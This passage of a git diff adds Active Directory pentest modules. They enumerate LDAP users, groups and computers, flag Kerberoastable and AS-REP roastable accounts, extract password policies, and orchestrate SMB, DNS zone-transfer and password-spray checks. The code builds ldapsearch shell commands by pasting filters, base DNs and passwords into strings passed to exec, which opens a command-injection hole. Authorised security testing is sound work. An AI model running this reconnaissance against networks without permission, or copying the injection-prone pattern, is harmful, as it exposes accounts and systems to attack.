+      }
+      if (asrepRoastable.length > 0) {
+        result.findings.push(`${asrepRoastable.length} AS-REP roastable users found`)
+      }
+      if (admins.length > 0) {
+        result.findings.push(`${admins.length} users with adminCount=1`)
+      }
+    } catch (err) {
+      log.debug("Failed to enumerate users", { error: String(err) })
+    }
+
+    // Enumerate groups
+    try {
+      result.groups = await enumerateGroups(host, options)
+      result.findings.push(`Enumerated ${result.groups.length} groups`)
+
+      const privileged = result.groups.filter((g) => g.isPrivileged)
+      if (privileged.length > 0) {
+        result.findings.push(`${privileged.length} privileged groups found`)
+      }
+    } catch (err) {
+      log.debug("Failed to enumerate groups", { error: String(err) })
+    }
+
+    // Enumerate computers
+    try {
+      result.computers = await enumerateComputers(host, options)
+      result.findings.push(`Enumerated ${result.computers.length} computers`)
+
+      const dcs = result.computers.filter((c) => c.isDomainController)
+      if (dcs.length > 0) {
+        result.findings.push(`${dcs.length} domain controllers found`)
+      }
+    } catch (err) {
+      log.debug("Failed to enumerate computers", { error: String(err) })
+    }
+
+    log.info("LDAP enumeration complete", {
+      host,
+      users: result.users.length,
+      groups: result.groups.length,
+      computers: result.computers.length,
+    })
+
+    return result
+  }
+
+  /**
+   * Get domain information.
+   */
+  async function getDomainInfo(
+    host: string,
+    options: LDAPEnumOptions
+  ): Promise<Partial<NetScanTypes.ADDomain>> {
+    const output = await runLdapSearch(
+      host,
+      options,
+      options.baseDN,
+      "(objectClass=domain)",
+      ["name", "objectSid", "ms-DS-MachineAccountQuota", "msDS-Behavior-Version"]
+    )
+
+    const results = LdapsearchParser.parse(output)
+    return results.domainInfo || {}
+  }
+
+  /**
+   * Enumerate users.
+   */
+  export async function enumerateUsers(
+    host: string,
+    options: LDAPEnumOptions
+  ): Promise<NetScanTypes.ADUser[]> {
+    const filter = "(&(objectCategory=person)(objectClass=user))"
+    const attributes = [
+      "sAMAccountName",
+      "distinguishedName",
+      "userPrincipalName",
+      "displayName",
+      "memberOf",
+      "userAccountControl",
+      "pwdLastSet",
+      "lastLogon",
+      "adminCount",
+      "servicePrincipalName",
+    ]
+
+    const output = await runLdapSearch(host, options, options.baseDN, filter, attributes)
+    const results = LdapsearchParser.parse(output)
+    return results.users
+  }
+
+  /**
+   * Enumerate groups.
+   */
+  export async function enumerateGroups(
+    host: string,
+    options: LDAPEnumOptions
+  ): Promise<NetScanTypes.ADGroup[]> {
+    const filter = "(objectCategory=group)"
+    const attributes = [
+      "sAMAccountName",
+      "distinguishedName",
+      "description",
+      "member",
+      "memberOf",
+    ]
+
+    const output = await runLdapSearch(host, options, options.baseDN, filter, attributes)
+    const results = LdapsearchParser.parse(output)
+    return results.groups
+  }
+
+  /**
+   * Enumerate computers.
+   */
+  export async function enumerateComputers(
+    host: string,
+    options: LDAPEnumOptions
+  ): Promise<NetScanTypes.ADComputer[]> {
+    const filter = "(objectCategory=computer)"
+    const attributes = [
+      "sAMAccountName",
+      "distinguishedName",
+      "dNSHostName",
+      "operatingSystem",
+      "operatingSystemVersion",
+      "userAccountControl",
+      "lastLogon",
+      "servicePrincipalName",
+    ]
+
+    const output = await runLdapSearch(host, options, options.baseDN, filter, attributes)
+    const results = LdapsearchParser.parse(output)
+    return results.computers
+  }
+
+  /**
+   * Find Kerberoastable users.
+   */
+  export async function findKerberoastable(
+    host: string,
+    options: LDAPEnumOptions
+  ): Promise<NetScanTypes.ADUser[]> {
+    const filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
+    const attributes = [
+      "sAMAccountName",
+      "distinguishedName",
+      "servicePrincipalName",
+      "memberOf",
+      "adminCount",
+    ]
+
+    const output = await runLdapSearch(host, options, options.baseDN, filter, attributes)
+    const results = LdapsearchParser.parse(output)
+    return results.users
+  }
+
+  /**
+   * Find AS-REP roastable users.
+   */
+  export async function findASRepRoastable(
+    host: string,
+    options: LDAPEnumOptions
+  ): Promise<NetScanTypes.ADUser[]> {
+    // userAccountControl flag 0x400000 = DONT_REQ_PREAUTH
+    const filter = "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
+    const attributes = [
+      "sAMAccountName",
+      "distinguishedName",
+      "memberOf",
+      "adminCount",
+    ]
+
+    const output = await runLdapSearch(host, options, options.baseDN, filter, attributes)
+    const results = LdapsearchParser.parse(output)
+    return results.users
+  }
+
+  /**
+   * Find users with adminCount=1.
+   */
+  export async function findAdminUsers(
+    host: string,
+    options: LDAPEnumOptions
+  ): Promise<NetScanTypes.ADUser[]> {
+    const filter = "(&(objectCategory=person)(objectClass=user)(adminCount=1))"
+    const attributes = [
+      "sAMAccountName",
+      "distinguishedName",
+      "memberOf",
+      "userAccountControl",
+    ]
+
+    const output = await runLdapSearch(host, options, options.baseDN, filter, attributes)
+    const results = LdapsearchParser.parse(output)
+    return results.users
+  }
+
+  /**
+   * Run ldapsearch command.
+   */
+  async function runLdapSearch(
+    host: string,
+    options: LDAPEnumOptions,
+    baseDN: string,
+    filter: string,
+    attributes: string[]
+  ): Promise<string> {
+    const port = options.port || (options.ssl ? 636 : 389)
+    const ssl = options.ssl || port === 636
+    const timeout = options.timeout || 60000
+    const ldapUrl = ssl ? `ldaps://${host}:${port}` : `ldap://${host}:${port}`
+
+    let cmd = `ldapsearch -x -H '${ldapUrl}' -b '${baseDN}' '${filter}' ${attributes.join(" ")}`
+
+    if (options.auth) {
+      const bindDN = options.auth.domain
+        ? `${options.auth.username}@${options.auth.domain}`
+        : options.auth.username
+      cmd += ` -D '${bindDN}' -w '${options.auth.password}'`
+    }
+
+    if (options.pageSize) {
+      cmd += ` -E pr=${options.pageSize}`
+    }
+
+    cmd += " 2>&1"
+
+    const { stdout } = await execAsync(cmd, {
+      timeout,
+      maxBuffer: 50 * 1024 * 1024,
+    })
+
+    return stdout
+  }
+
+  /**
+   * Get group members recursively.
+   */
+  export async function getGroupMembers(
+    host: string,
+    groupDN: string,
+    options: LDAPEnumOptions,
+    recursive: boolean = false
+  ): Promise<string[]> {
+    const filter = recursive
+      ? `(memberOf:1.2.840.113556.1.4.1941:=${groupDN})`
+      : `(memberOf=${groupDN})`
+    const attributes = ["distinguishedName", "sAMAccountName"]
+
+    const output = await runLdapSearch(host, options, options.baseDN, filter, attributes)
+    const results = LdapsearchParser.parse(output)
+
+    return results.users.map((u) => u.distinguishedName)
+  }
+
+  /**
+   * Format enumeration results for display.
+   */
+  export function formatResults(result: LDAPEnumResult): string {
+    const lines: string[] = []
+
+    lines.push(`LDAP Enumeration Results: ${result.host}`)
+    lines.push(`Base DN: ${result.baseDN}`)
+    lines.push("")
+    lines.push(`Users: ${result.users.length}`)
+    lines.push(`Groups: ${result.groups.length}`)
+    lines.push(`Computers: ${result.computers.length}`)
+    lines.push("")
+
+    if (result.domainInfo) {
+      lines.push("Domain Information:")
+      if (result.domainInfo.name) lines.push(`  Name: ${result.domainInfo.name}`)
+      if (result.domainInfo.functionalLevel)
+        lines.push(`  Functional Level: ${result.domainInfo.functionalLevel}`)
+      lines.push("")
+    }
+
+    // Show interesting users
+    const kerberoastable = result.users.filter((u) => u.servicePrincipalNames.length > 0)
+    if (kerberoastable.length > 0) {
+      lines.push("Kerberoastable Users:")
+      for (const user of kerberoastable.slice(0, 10)) {
+        lines.push(`  - ${user.samAccountName} (${user.servicePrincipalNames.length} SPNs)`)
+      }
+      if (kerberoastable.length > 10) {
+        lines.push(`  ... and ${kerberoastable.length - 10} more`)
+      }
+      lines.push("")
+    }
+
+    const asrepRoastable = result.users.filter((u) => u.dontRequirePreauth)
+    if (asrepRoastable.length > 0) {
+      lines.push("AS-REP Roastable Users:")
+      for (const user of asrepRoastable) {
+        lines.push(`  - ${user.samAccountName}`)
+      }
+      lines.push("")
+    }
+
+    for (const finding of result.findings) {
+      lines.push(`[!] ${finding}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/ldap/index.ts b/packages/opencode/src/pentest/netscan/ldap/index.ts
new file mode 100644
index 00000000000..8fc25eb4a2e
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/ldap/index.ts
@@ -0,0 +1,21 @@
+/**
+ * @fileoverview LDAP Module Exports
+ *
+ * Export all LDAP testing functionality.
+ *
+ * @module pentest/netscan/ldap
+ */
+
+export { LDAPBind } from "./bind"
+export type { LDAPBindOptions, LDAPAuth, LDAPBindResult, AuthBindResult } from "./bind"
+
+export { LDAPEnum } from "./enum"
+export type { LDAPEnumOptions, LDAPEnumResult } from "./enum"
+
+export { LDAPPolicy } from "./policy"
+export type {
+  PolicyOptions,
+  PolicyResult,
+  FineGrainedPolicy,
+  PolicyWeakness,
+} from "./policy"
diff --git a/packages/opencode/src/pentest/netscan/ldap/policy.ts b/packages/opencode/src/pentest/netscan/ldap/policy.ts
new file mode 100644
index 00000000000..81cad809d6f
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/ldap/policy.ts
@@ -0,0 +1,439 @@
+/**
+ * @fileoverview LDAP Password Policy Extraction
+ *
+ * Extract password policies from Active Directory via LDAP.
+ *
+ * @module pentest/netscan/ldap/policy
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { NetScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.ldap.policy" })
+
+/**
+ * Policy extraction options.
+ */
+export interface PolicyOptions {
+  port?: number
+  ssl?: boolean
+  timeout?: number
+  baseDN: string
+  auth?: {
+    username: string
+    password: string
+    domain?: string
+  }
+}
+
+/**
+ * Policy extraction result.
+ */
+export interface PolicyResult {
+  host: string
+  domainPolicy?: NetScanTypes.PasswordPolicy
+  fineGrainedPolicies: FineGrainedPolicy[]
+  findings: string[]
+  weaknesses: PolicyWeakness[]
+}
+
+/**
+ * Fine-grained password policy.
+ */
+export interface FineGrainedPolicy {
+  name: string
+  precedence: number
+  appliesTo: string[]
+  policy: NetScanTypes.PasswordPolicy
+}
+
+/**
+ * Password policy weakness.
+ */
+export interface PolicyWeakness {
+  type: string
+  severity: "critical" | "high" | "medium" | "low"
+  description: string
+  recommendation: string
+}
+
+/**
+ * LDAP policy namespace.
+ */
+export namespace LDAPPolicy {
+  /**
+   * Extract password policies.
+   */
+  export async function extract(
+    host: string,
+    options: PolicyOptions
+  ): Promise<PolicyResult> {
+    const port = options.port || (options.ssl ? 636 : 389)
+    const ssl = options.ssl || port === 636
+    const timeout = options.timeout || 30000
+
+    const result: PolicyResult = {
+      host,
+      fineGrainedPolicies: [],
+      findings: [],
+      weaknesses: [],
+    }
+
+    log.info("Extracting password policies", { host, baseDN: options.baseDN })
+
+    // Get domain-level password policy
+    try {
+      result.domainPolicy = await getDomainPolicy(host, options)
+      if (result.domainPolicy) {
+        result.findings.push("Domain password policy extracted")
+        result.weaknesses.push(...analyzePolicy(result.domainPolicy))
+      }
+    } catch (err) {
+      log.debug("Failed to get domain policy", { error: String(err) })
+    }
+
+    // Get fine-grained password policies
+    try {
+      result.fineGrainedPolicies = await getFineGrainedPolicies(host, options)
+      if (result.fineGrainedPolicies.length > 0) {
+        result.findings.push(
+          `${result.fineGrainedPolicies.length} fine-grained password policies found`
+        )
+
+        for (const fgpp of result.fineGrainedPolicies) {
+          result.weaknesses.push(...analyzePolicy(fgpp.policy, fgpp.name))
+        }
+      }
+    } catch (err) {
+      log.debug("Failed to get fine-grained policies", { error: String(err) })
+    }
+
+    log.info("Password policy extraction complete", {
+      host,
+      hasDomainPolicy: !!result.domainPolicy,
+      fgppCount: result.fineGrainedPolicies.length,
+      weaknessCount: result.weaknesses.length,
+    })
+
+    return result
+  }
+
+  /**
+   * Get domain-level password policy.
+   */
+  async function getDomainPolicy(
+    host: string,
+    options: PolicyOptions
+  ): Promise<NetScanTypes.PasswordPolicy | undefined> {
+    const port = options.port || (options.ssl ? 636 : 389)
+    const ssl = options.ssl || port === 636
+    const ldapUrl = ssl ? `ldaps://${host}:${port}` : `ldap://${host}:${port}`
+
+    let cmd = `ldapsearch -x -H '${ldapUrl}' -b '${options.baseDN}' '(objectClass=domain)' minPwdLength maxPwdAge minPwdAge pwdHistoryLength pwdProperties lockoutThreshold lockoutDuration lockOutObservationWindow`
+
+    if (options.auth) {
+      const bindDN = options.auth.domain
+        ? `${options.auth.username}@${options.auth.domain}`
+        : options.auth.username
+      cmd += ` -D '${bindDN}' -w '${options.auth.password}'`
+    }
+
+    cmd += " 2>&1"
+
+    const { stdout } = await execAsync(cmd, { timeout: options.timeout || 30000 })
+
+    return parseDomainPolicy(stdout)
+  }
+
+  /**
+   * Parse domain policy from ldapsearch output.
+   */
+  function parseDomainPolicy(output: string): NetScanTypes.PasswordPolicy | undefined {
+    const policy: Partial<NetScanTypes.PasswordPolicy> = {}
+
+    const minLengthMatch = output.match(/minPwdLength:\s*(\d+)/i)
+    if (minLengthMatch) {
+      policy.minLength = parseInt(minLengthMatch[1], 10)
+    }
+
+    const maxAgeMatch = output.match(/maxPwdAge:\s*(-?\d+)/i)
+    if (maxAgeMatch) {
+      // Convert 100-nanosecond intervals to days
+      const interval = BigInt(maxAgeMatch[1])
+      policy.maxAge = Math.abs(Number(interval / -864000000000n))
+    }
+
+    const minAgeMatch = output.match(/minPwdAge:\s*(-?\d+)/i)
+    if (minAgeMatch) {
+      const interval = BigInt(minAgeMatch[1])
+      policy.minAge = Math.abs(Number(interval / -864000000000n))
+    }
+
+    const historyMatch = output.match(/pwdHistoryLength:\s*(\d+)/i)
+    if (historyMatch) {
+      policy.historyLength = parseInt(historyMatch[1], 10)
+    }
+
+    const propsMatch = output.match(/pwdProperties:\s*(\d+)/i)
+    if (propsMatch) {
+      // Bit 0 = complexity required
+      policy.complexity = (parseInt(propsMatch[1], 10) & 1) !== 0
+    }
+
+    const lockoutMatch = output.match(/lockoutThreshold:\s*(\d+)/i)
+    if (lockoutMatch) {
+      policy.lockoutThreshold = parseInt(lockoutMatch[1], 10)
+    }
+
+    const lockoutDurationMatch = output.match(/lockoutDuration:\s*(-?\d+)/i)
+    if (lockoutDurationMatch) {
+      const interval = BigInt(lockoutDurationMatch[1])
+      policy.lockoutDuration = Math.abs(Number(interval / -600000000n)) // To minutes
+    }
+
+    const observationMatch = output.match(/lockOutObservationWindow:\s*(-?\d+)/i)
+    if (observationMatch) {
+      const interval = BigInt(observationMatch[1])
+      policy.lockoutObservationWindow = Math.abs(Number(interval / -600000000n))
+    }
+
+    if (Object.keys(policy).length === 0) {
+      return undefined
+    }
+
+    return {
+      minLength: policy.minLength || 0,
+      maxAge: policy.maxAge || 0,
+      minAge: policy.minAge || 0,
+      historyLength: policy.historyLength || 0,
+      complexity: policy.complexity || false,
+      lockoutThreshold: policy.lockoutThreshold || 0,
+      lockoutDuration: policy.lockoutDuration || 0,
+      lockoutObservationWindow: policy.lockoutObservationWindow || 0,
+    }
+  }
+
+  /**
+   * Get fine-grained password policies.
+   */
+  async function getFineGrainedPolicies(
+    host: string,
+    options: PolicyOptions
+  ): Promise<FineGrainedPolicy[]> {
+    const port = options.port || (options.ssl ? 636 : 389)
+    const ssl = options.ssl || port === 636
+    const ldapUrl = ssl ? `ldaps://${host}:${port}` : `ldap://${host}:${port}`
+
+    // Fine-grained policies are in CN=Password Settings Container,CN=System
+    const pscDN = `CN=Password Settings Container,CN=System,${options.baseDN}`
+
+    let cmd = `ldapsearch -x -H '${ldapUrl}' -b '${pscDN}' '(objectClass=msDS-PasswordSettings)' cn msDS-PasswordSettingsPrecedence msDS-PSOAppliesTo msDS-MinimumPasswordLength msDS-MaximumPasswordAge msDS-MinimumPasswordAge msDS-PasswordHistoryLength msDS-PasswordComplexityEnabled msDS-LockoutThreshold msDS-LockoutDuration msDS-LockoutObservationWindow`
+
+    if (options.auth) {
+      const bindDN = options.auth.domain
+        ? `${options.auth.username}@${options.auth.domain}`
+        : options.auth.username
+      cmd += ` -D '${bindDN}' -w '${options.auth.password}'`
+    }
+
+    cmd += " 2>&1"
+
+    try {
+      const { stdout } = await execAsync(cmd, { timeout: options.timeout || 30000 })
+      return parseFineGrainedPolicies(stdout)
+    } catch {
+      return []
+    }
+  }
+
+  /**
+   * Parse fine-grained policies from ldapsearch output.
+   */
+  function parseFineGrainedPolicies(output: string): FineGrainedPolicy[] {
+    const policies: FineGrainedPolicy[] = []
+    const entries = output.split(/\n\n+/)
+
+    for (const entry of entries) {
+      if (!entry.includes("msDS-PasswordSettings")) continue
+
+      const nameMatch = entry.match(/cn:\s*(.+)/i)
+      const precedenceMatch = entry.match(/msDS-PasswordSettingsPrecedence:\s*(\d+)/i)
+
+      if (!nameMatch) continue
+
+      const policy: FineGrainedPolicy = {
+        name: nameMatch[1].trim(),
+        precedence: precedenceMatch ? parseInt(precedenceMatch[1], 10) : 0,
+        appliesTo: [],
+        policy: {
+          minLength: 0,
+          maxAge: 0,
+          minAge: 0,
+          historyLength: 0,
+          complexity: false,
+          lockoutThreshold: 0,
+          lockoutDuration: 0,
+          lockoutObservationWindow: 0,
+        },
+      }
+
+      // Parse applies to
+      const appliesToMatches = entry.matchAll(/msDS-PSOAppliesTo:\s*(.+)/gi)
+      for (const match of appliesToMatches) {
+        policy.appliesTo.push(match[1].trim())
+      }
+
+      // Parse policy values
+      const minLengthMatch = entry.match(/msDS-MinimumPasswordLength:\s*(\d+)/i)
+      if (minLengthMatch) {
+        policy.policy.minLength = parseInt(minLengthMatch[1], 10)
+      }
+
+      const complexityMatch = entry.match(/msDS-PasswordComplexityEnabled:\s*(TRUE|FALSE)/i)
+      if (complexityMatch) {
+        policy.policy.complexity = complexityMatch[1].toUpperCase() === "TRUE"
+      }
+
+      const lockoutMatch = entry.match(/msDS-LockoutThreshold:\s*(\d+)/i)
+      if (lockoutMatch) {
+        policy.policy.lockoutThreshold = parseInt(lockoutMatch[1], 10)
+      }
+
+      policies.push(policy)
+    }
+
+    return policies
+  }
+
+  /**
+   * Analyze policy for weaknesses.
+   */
+  export function analyzePolicy(
+    policy: NetScanTypes.PasswordPolicy,
+    policyName?: string
+  ): PolicyWeakness[] {
+    const weaknesses: PolicyWeakness[] = []
+    const prefix = policyName ? `[${policyName}] ` : ""
+
+    // Check minimum length
+    const minLength = policy.minLength ?? 0
+    if (minLength < 8) {
+      weaknesses.push({
+        type: "weak_min_length",
+        severity: minLength < 6 ? "critical" : "high",
+        description: `${prefix}Minimum password length is only ${minLength} characters`,
+        recommendation: "Increase minimum password length to at least 12 characters",
+      })
+    } else if (minLength < 12) {
+      weaknesses.push({
+        type: "short_min_length",
+        severity: "medium",
+        description: `${prefix}Minimum password length of ${minLength} is below recommended`,
+        recommendation: "Consider increasing minimum password length to 14+ characters",
+      })
+    }
+
+    // Check complexity
+    if (!policy.complexity) {
+      weaknesses.push({
+        type: "no_complexity",
+        severity: "high",
+        description: `${prefix}Password complexity is not required`,
+        recommendation: "Enable password complexity requirements",
+      })
+    }
+
+    // Check password age
+    const maxAge = policy.maxAge ?? 0
+    if (maxAge === 0) {
+      weaknesses.push({
+        type: "no_password_expiry",
+        severity: "medium",
+        description: `${prefix}Passwords do not expire`,
+        recommendation: "Consider implementing password expiration (though modern guidance varies)",
+      })
+    }
+
+    // Check lockout threshold
+    const lockoutThreshold = policy.lockoutThreshold ?? 0
+    if (lockoutThreshold === 0) {
+      weaknesses.push({
+        type: "no_lockout",
+        severity: "high",
+        description: `${prefix}No account lockout policy configured`,
+        recommendation: "Configure account lockout after 5-10 failed attempts",
+      })
+    } else if (lockoutThreshold > 10) {
+      weaknesses.push({
+        type: "high_lockout_threshold",
+        severity: "medium",
+        description: `${prefix}Account lockout threshold is high (${lockoutThreshold} attempts)`,
+        recommendation: "Reduce lockout threshold to 5-10 failed attempts",
+      })
+    }
+
+    // Check history length
+    const historyLength = policy.historyLength ?? 0
+    if (historyLength < 12) {
+      weaknesses.push({
+        type: "short_history",
+        severity: "low",
+        description: `${prefix}Password history only remembers ${historyLength} passwords`,
+        recommendation: "Increase password history to at least 24 passwords",
+      })
+    }
+
+    return weaknesses
+  }
+
+  /**
+   * Format policy results for display.
+   */
+  export function formatResults(result: PolicyResult): string {
+    const lines: string[] = []
+
+    lines.push(`Password Policy Analysis: ${result.host}`)
+    lines.push("")
+
+    if (result.domainPolicy) {
+      lines.push("Domain Password Policy:")
+      lines.push(`  Minimum Length: ${result.domainPolicy.minLength}`)
+      lines.push(`  Complexity Required: ${result.domainPolicy.complexity ? "Yes" : "No"}`)
+      lines.push(`  Max Password Age: ${result.domainPolicy.maxAge} days`)
+      lines.push(`  Min Password Age: ${result.domainPolicy.minAge} days`)
+      lines.push(`  Password History: ${result.domainPolicy.historyLength}`)
+      lines.push(`  Lockout Threshold: ${result.domainPolicy.lockoutThreshold || "None"}`)
+      lines.push(`  Lockout Duration: ${result.domainPolicy.lockoutDuration} minutes`)
+      lines.push("")
+    }
+
+    if (result.fineGrainedPolicies.length > 0) {
+      lines.push("Fine-Grained Password Policies:")
+      for (const fgpp of result.fineGrainedPolicies) {
+        lines.push(`  ${fgpp.name} (Precedence: ${fgpp.precedence})`)
+        lines.push(`    Min Length: ${fgpp.policy.minLength}`)
+        lines.push(`    Complexity: ${fgpp.policy.complexity ? "Yes" : "No"}`)
+        lines.push(`    Applies To: ${fgpp.appliesTo.length} objects`)
+      }
+      lines.push("")
+    }
+
+    if (result.weaknesses.length > 0) {
+      lines.push("Policy Weaknesses:")
+      for (const weakness of result.weaknesses) {
+        lines.push(`  [${weakness.severity.toUpperCase()}] ${weakness.description}`)
+        lines.push(`    Recommendation: ${weakness.recommendation}`)
+      }
+      lines.push("")
+    }
+
+    for (const finding of result.findings) {
+      lines.push(`[!] ${finding}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/orchestrator.ts b/packages/opencode/src/pentest/netscan/orchestrator.ts
new file mode 100644
index 00000000000..6852a564923
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/orchestrator.ts
@@ -0,0 +1,636 @@
+/**
+ * @fileoverview Network Scan Orchestrator
+ *
+ * Coordinates all network scanning modules based on scan profiles.
+ *
+ * @module pentest/netscan/orchestrator
+ */
+
+import { NetScanTypes } from "./types"
+import { NetScanEvents } from "./events"
+import { NetScanStorage } from "./storage"
+import { NetScanProfiles } from "./profiles"
+import { SMBShares, SMBSessions, SMBSigning, SMBVulns } from "./smb"
+import { DNSZone, DNSEnum } from "./dns"
+import { SNMPCommunity, SNMPWalk, SNMPWrite } from "./snmp"
+import { LDAPBind, LDAPEnum, LDAPPolicy } from "./ldap"
+import { ADEnumeration, Kerberos, DomainTrusts } from "./ad"
+import { DefaultCreds, PasswordSpray } from "./creds"
+import { Bus } from "../../bus"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "netscan.orchestrator" })
+
+/**
+ * Orchestrator options.
+ */
+export interface OrchestratorOptions {
+  profile?: NetScanTypes.ProfileId
+  customProfile?: Partial<NetScanTypes.ScanProfile>
+  auth?: {
+    username: string
+    password: string
+    domain?: string
+  }
+  timeout?: number
+  storageConfig?: { storage?: "file" | "memory" }
+}
+
+/**
+ * Network scan orchestrator namespace.
+ */
+export namespace NetScanOrchestrator {
+  /**
+   * Run a network scan with the specified profile.
+   */
+  export async function scan(
+    target: string,
+    options: OrchestratorOptions = {}
+  ): Promise<NetScanTypes.NetScanResult> {
+    const profileId = options.profile || "standard"
+    let profile = NetScanProfiles.get(profileId) || NetScanProfiles.Standard
+
+    // Apply custom profile overrides
+    if (options.customProfile) {
+      profile = NetScanProfiles.createCustom(profileId, options.customProfile)
+    }
+
+    const scanID = `netscan_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`
+    const startTime = Date.now()
+
+    log.info("Starting network scan", { scanID, target, profile: profile.id })
+
+    const result: NetScanTypes.NetScanResult = {
+      id: scanID,
+      target,
+      profile: profile.id,
+      hosts: [],
+      smbResults: [],
+      dnsZones: [],
+      ldapResults: [],
+      findings: [],
+      stats: {
+        hostsDiscovered: 0,
+        hostsScanned: 0,
+        servicesFound: 0,
+        servicesDiscovered: 0,
+        sharesFound: 0,
+        usersEnumerated: 0,
+        groupsEnumerated: 0,
+        credentialsTested: 0,
+        credentialsFound: 0,
+        credentialsValid: 0,
+        vulnerabilitiesFound: 0,
+        findingsCount: 0,
+        criticalCount: 0,
+        highCount: 0,
+        mediumCount: 0,
+        lowCount: 0,
+        infoCount: 0,
+        duration: 0,
+      },
+      startedAt: startTime,
+      status: "running",
+    }
+
+    // Emit scan started event
+    Bus.publish(NetScanEvents.ScanStarted, {
+      scanID,
+      target,
+      profile: profile.id,
+      modules: Object.entries(profile.modules)
+        .filter(([_, m]) => m.enabled)
+        .map(([name]) => name),
+    })
+
+    try {
+      // Run modules based on profile
+      await runModules(target, profile, options, result)
+
+      result.status = "completed"
+      result.completedAt = Date.now()
+
+      // Emit scan completed event
+      Bus.publish(NetScanEvents.ScanCompleted, {
+        scanID,
+        target,
+        profile: profile.id,
+        hostsDiscovered: result.hosts.length,
+        servicesDiscovered: result.stats.servicesFound,
+        findingsCount: result.findings.length,
+        credentialsFound: result.stats.credentialsFound,
+        duration: result.completedAt - startTime,
+        status: "completed",
+      })
+    } catch (err) {
+      result.status = "failed"
+      result.completedAt = Date.now()
+      result.findings.push(`Scan failed: ${String(err)}`)
+
+      // Emit scan failed event
+      Bus.publish(NetScanEvents.ScanFailed, {
+        scanID,
+        target,
+        error: String(err),
+      })
+
+      log.error("Scan failed", { scanID, error: String(err) })
+    }
+
+    // Save result
+    await NetScanStorage.saveScan(result, options.storageConfig)
+
+    log.info("Network scan complete", {
+      scanID,
+      status: result.status,
+      duration: (result.completedAt || Date.now()) - startTime,
+    })
+
+    return result
+  }
+
+  /**
+   * Run all enabled modules.
+   */
+  async function runModules(
+    target: string,
+    profile: NetScanTypes.ScanProfile,
+    options: OrchestratorOptions,
+    result: NetScanTypes.NetScanResult
+  ): Promise<void> {
+    const timeout = options.timeout || profile.timeout
+
+    // SMB Module
+    if (profile.modules.smb.enabled) {
+      log.info("Running SMB module", { target })
+
+      // Share enumeration
+      if (profile.modules.smb.shares) {
+        try {
+          const shares = await SMBShares.enumerate(target, {
+            auth: options.auth
+              ? { username: options.auth.username, password: options.auth.password, domain: options.auth.domain }
+              : undefined,
+            timeout,
+            checkAccess: true,
+          })
+
+          result.shares = shares
+          result.findings.push(`Enumerated ${shares.length} SMB shares`)
+
+          const anonShares = shares.filter((s) => s.permissions.anonymous)
+          if (anonShares.length > 0) {
+            result.findings.push(`${anonShares.length} shares accessible anonymously`)
+          }
+
+          const writableShares = shares.filter((s) => s.permissions.write)
+          if (writableShares.length > 0) {
+            result.findings.push(`${writableShares.length} shares are writable`)
+          }
+
+          Bus.publish(NetScanEvents.ShareFound, {
+            scanID: result.id,
+            host: target,
+            shareName: shares.map((s) => s.name).join(", "),
+            shareType: "multiple",
+            readable: shares.some((s) => s.permissions.read),
+            writable: shares.some((s) => s.permissions.write),
+            anonymous: shares.some((s) => s.permissions.anonymous),
+          })
+        } catch (err) {
+          log.debug("SMB share enumeration failed", { error: String(err) })
+        }
+      }
+
+      // Null session testing
+      if (profile.modules.smb.nullSession) {
+        try {
+          const nullSession = await SMBSessions.testNullSession(target, { timeout })
+          if (nullSession.allowed) {
+            result.findings.push("SMB null session is allowed")
+            result.findings.push(...nullSession.findings)
+
+            Bus.publish(NetScanEvents.NullSessionFound, {
+              scanID: result.id,
+              host: target,
+              sharesAccessible: nullSession.sharesAccessible,
+              usersEnumerable: nullSession.usersEnumerable,
+            })
+          }
+        } catch (err) {
+          log.debug("Null session test failed", { error: String(err) })
+        }
+      }
+
+      // Signing check
+      if (profile.modules.smb.signing) {
+        try {
+          const signing = await SMBSigning.check(target, { timeout })
+          if (signing.vulnerable) {
+            result.findings.push("SMB signing not required - vulnerable to relay attacks")
+            result.stats.vulnerabilitiesFound++
+
+            Bus.publish(NetScanEvents.SMBSigningStatus, {
+              scanID: result.id,
+              host: target,
+              required: signing.required,
+              enabled: signing.enabled,
+            })
+          }
+        } catch (err) {
+          log.debug("SMB signing check failed", { error: String(err) })
+        }
+      }
+
+      // Vulnerability check
+      if (profile.modules.smb.vulns) {
+        try {
+          const vulns = await SMBVulns.check(target, { timeout })
+          if (vulns.vulnerabilities.length > 0) {
+            result.findings.push(...vulns.findings)
+            result.stats.vulnerabilitiesFound += vulns.vulnerabilities.length
+
+            for (const vuln of vulns.vulnerabilities) {
+              Bus.publish(NetScanEvents.VulnerabilityFound, {
+                scanID: result.id,
+                host: target,
+                vulnerability: vuln.name,
+                severity: vuln.severity,
+                cve: vuln.cve,
+                service: "smb",
+              })
+            }
+          }
+        } catch (err) {
+          log.debug("SMB vulnerability check failed", { error: String(err) })
+        }
+      }
+    }
+
+    // DNS Module
+    if (profile.modules.dns.enabled) {
+      log.info("Running DNS module", { target })
+
+      // Zone transfer
+      if (profile.modules.dns.zoneTransfer) {
+        try {
+          const zone = await DNSZone.attemptTransfer(target)
+          if (zone.success) {
+            result.dnsZones = [DNSZone.toZoneType(zone)]
+            result.findings.push(...zone.findings)
+
+            Bus.publish(NetScanEvents.ZoneTransferSuccess, {
+              scanID: result.id,
+              domain: target,
+              nameserver: zone.nameserver,
+              recordCount: zone.records.length,
+            })
+          }
+        } catch (err) {
+          log.debug("Zone transfer failed", { error: String(err) })
+        }
+      }
+
+      // Subdomain enumeration
+      if (profile.modules.dns.enumeration) {
+        try {
+          const subdomains = await DNSEnum.enumerate(target, {
+            bruteForce: true,
+            timeout,
+          })
+          if (subdomains.subdomains.length > 0) {
+            result.findings.push(`Found ${subdomains.subdomains.length} subdomains`)
+
+            for (const sub of subdomains.subdomains) {
+              Bus.publish(NetScanEvents.SubdomainFound, {
+                scanID: result.id,
+                domain: target,
